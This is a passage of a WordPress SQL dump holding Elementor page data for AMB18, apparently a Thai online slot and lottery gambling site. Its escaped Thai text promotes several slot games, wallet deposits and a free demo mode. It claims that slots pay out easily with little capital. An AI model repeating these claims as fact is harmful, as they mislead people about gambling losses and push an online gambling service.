400;\\\">\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e35\\u0e49\\u0e01\\u0e47\\u0e04\\u0e37\\u0e2d\\u0e41\\u0e2b\\u0e25\\u0e48\\u0e07\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2e\\u0e34\\u0e15\\u0e19\\u0e48\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1a\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e40\\u0e01\\u0e21\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e17\\u0e35\\u0e48\\u0e04\\u0e27\\u0e23\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e04\\u0e31\\u0e14\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e01\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e2e\\u0e34\\u0e15\\u0e15\\u0e34\\u0e14\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a\\u0e21\\u0e32\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e15\\u0e32\\u0e21\\u0e2b\\u0e32\\u0e40\\u0e01\\u0e21\\u0e14\\u0e31\\u0e07\\u0e08\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e23\\u0e27\\u0e21\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e2a\\u0e23\\u0e23\\u0e1e\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e40\\u0e01\\u0e21\\u0e21\\u0e35\\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27\\u0e17\\u0e31\\u0e49\\u0e07\\u0e43\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e2d\\u0e31\\u0e15\\u0e23\\u0e32\\u0e01\\u0e32\\u0e23\\u0e08\\u0e48\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e01\\u0e21\\u0e04\\u0e38\\u0e13\\u0e20\\u0e32\\u0e1e\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e01\\u0e25 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23\\u0e17\\u0e35\\u0e48\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e33\\u0e19\\u0e27\\u0e19\\u0e21\\u0e32\\u0e01\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32\\u0e02\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e27\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ecb961\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d266248\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0ab58bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><span style=\\\"color: #99cc00;\\\"><b>AMB18 <\\/b><b>\\u0e40\\u0e01\\u0e21 Wild West Gold <\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Wild West Gold \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e18\\u0e35\\u0e21\\u0e04\\u0e32\\u0e27\\u0e1a\\u0e2d\\u0e22\\u0e17\\u0e35\\u0e48\\u0e42\\u0e14\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e41\\u0e25\\u0e30\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e43\\u0e19\\u0e14\\u0e34\\u0e19\\u0e41\\u0e14\\u0e19\\u0e15\\u0e30\\u0e27\\u0e31\\u0e19\\u0e15\\u0e01\\u0e2a\\u0e38\\u0e14\\u0e14\\u0e34\\u0e1a \\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e35\\u0e22\\u0e07\\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e17\\u0e34\\u0e28\\u0e17\\u0e32\\u0e07 \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e23\\u0e49\\u0e32\\u0e43\\u0e08\\u0e43\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e19\\u0e34\\u0e22\\u0e21\\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e21\\u0e35\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e15\\u0e01\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21 Bonanza Gold\\u00a0<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Bonanza Gold \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e19\\u0e27\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e07\\u0e17\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e48\\u0e32\\u0e22\\u0e41\\u0e1a\\u0e1a\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21\\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e41\\u0e15\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e08\\u0e32\\u0e01\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e02\\u0e36\\u0e49\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e2d\\u0e1a\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e42\\u0e15\\u0e41\\u0e1a\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e2a\\u0e35\\u0e17\\u0e2d\\u0e07\\u0e42\\u0e14\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19 \\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e01\\u0e32\\u0e23\\u0e25\\u0e38\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e21\\u0e02\\u0e49\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e17\\u0e49\\u0e32\\u0e17\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e01\\u0e32\\u0e23\\u0e04\\u0e32\\u0e14\\u0e40\\u0e14\\u0e32\\u0e1c\\u0e25\\u0e25\\u0e31\\u0e1e\\u0e18\\u0e4c\\u0e43\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e2b\\u0e21\\u0e38\\u0e19<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21 The Dog House Megaways<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">The Dog House Megaways \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e43\\u0e0a\\u0e49\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e21\\u0e01\\u0e30\\u0e40\\u0e27\\u0e22\\u0e4c \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e08\\u0e33\\u0e19\\u0e27\\u0e19\\u0e27\\u0e34\\u0e18\\u0e35\\u0e0a\\u0e19\\u0e30\\u0e43\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e32\\u0e22\\u0e15\\u0e31\\u0e27 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e1a\\u0e49\\u0e32\\u0e19\\u0e2a\\u0e38\\u0e19\\u0e31\\u0e02\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e04\\u0e07\\u0e17\\u0e35\\u0e48\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e1a\\u0e19\\u0e27\\u0e07\\u0e25\\u0e49\\u0e2d \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e01\\u0e33\\u0e44\\u0e23\\u0e44\\u0e14\\u0e49\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e18\\u0e35\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e14\\u0e43\\u0e2a \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e19\\u0e48\\u0e32\\u0e23\\u0e31\\u0e01\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e2a\\u0e39\\u0e07 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e17\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e30\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e44\\u0e14\\u0e49\\u0e16\\u0e36\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e41\\u0e25\\u0e30\\u0e01\\u0e32\\u0e23\\u0e15\\u0e2d\\u0e1a\\u0e2a\\u0e19\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c0fa625\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-2-1-1.webp\",\"id\":352,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"49411b8\",\"elType\":\"widget\",\"settings\":{\"title\":\"AMB18 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e41\\u0e15\\u0e01 \\u0e07\\u0e48\\u0e32\\u0e22 \\u0e17\\u0e38\\u0e19 \\u0e19\\u0e49\\u0e2d\\u0e22 \\u0e27\\u0e2d \\u0e40\\u0e25\\u0e17 \\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e40\\u0e14\\u0e42\\u0e21\\u0e48\\u0e1f\\u0e23\\u0e35\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"035032d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e1a\\u0e32\\u0e22 <\\/span><b>\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e41\\u0e15\\u0e01 \\u0e07\\u0e48\\u0e32\\u0e22 \\u0e17\\u0e38\\u0e19 \\u0e19\\u0e49\\u0e2d\\u0e22 \\u0e27\\u0e2d \\u0e40\\u0e25\\u0e17 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e40\\u0e14\\u0e42\\u0e21\\u0e48\\u0e1f\\u0e23\\u0e35 \\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e08\\u0e23\\u0e34\\u0e07\\u0e08\\u0e31\\u0e07\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e40\\u0e14\\u0e42\\u0e21\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e15\\u0e31\\u0e14\\u0e2a\\u0e34\\u0e19\\u0e43\\u0e08\\u0e25\\u0e07\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e28\\u0e36\\u0e01\\u0e29\\u0e32\\u0e40\\u0e01\\u0e21\\u0e41\\u0e25\\u0e30\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e44\\u0e14\\u0e49\\u0e41\\u0e21\\u0e48\\u0e19\\u0e22\\u0e33\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e27\\u0e2d\\u0e40\\u0e25\\u0e17 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e18\\u0e38\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e41\\u0e25\\u0e30\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e44\\u0e2b\\u0e19\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e23\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e17\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e35\\u0e49\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e41\\u0e1e\\u0e25\\u0e15\\u0e1f\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e17\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e04\\u0e19\\u0e23\\u0e38\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01 \\u0e2b\\u0e32\\u0e01\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e21\\u0e32\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e30\\u0e44\\u0e21\\u0e48\\u0e23\\u0e39\\u0e49\\u0e08\\u0e30\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e44\\u0e23 \\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e41\\u0e04\\u0e48\\u0e41\\u0e2d\\u0e14 <\\/span><a href=\\\"http:\\/\\/luca333line.com\\\"><b>\\u0e44\\u0e25\\u0e19\\u0e4c<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e17\\u0e35\\u0e48\\u0e08\\u0e30\\u0e2a\\u0e2d\\u0e1a\\u0e16\\u0e32\\u0e21\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e40\\u0e15\\u0e34\\u0e21\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3203,418,'_thumbnail_id','371'),(3204,418,'_elementor_edit_mode','builder'),(3205,418,'_elementor_template_type','wp-page'),(3206,418,'_elementor_version','3.35.5'),(3207,418,'_elementor_pro_version','3.32.3'),(3208,418,'_wp_page_template','default'),(3209,418,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(3210,418,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Slot-NO1-AMB18.webp\",\"id\":363,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/True-wallet-AMB18.webp\",\"id\":365,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"AMB18 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e31\\u0e07\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 1 \\u0e1a\\u0e32\\u0e17\\n\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><a href=\\\"http:\\/\\/amb18slot.com\\\"><b>AMB18<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> 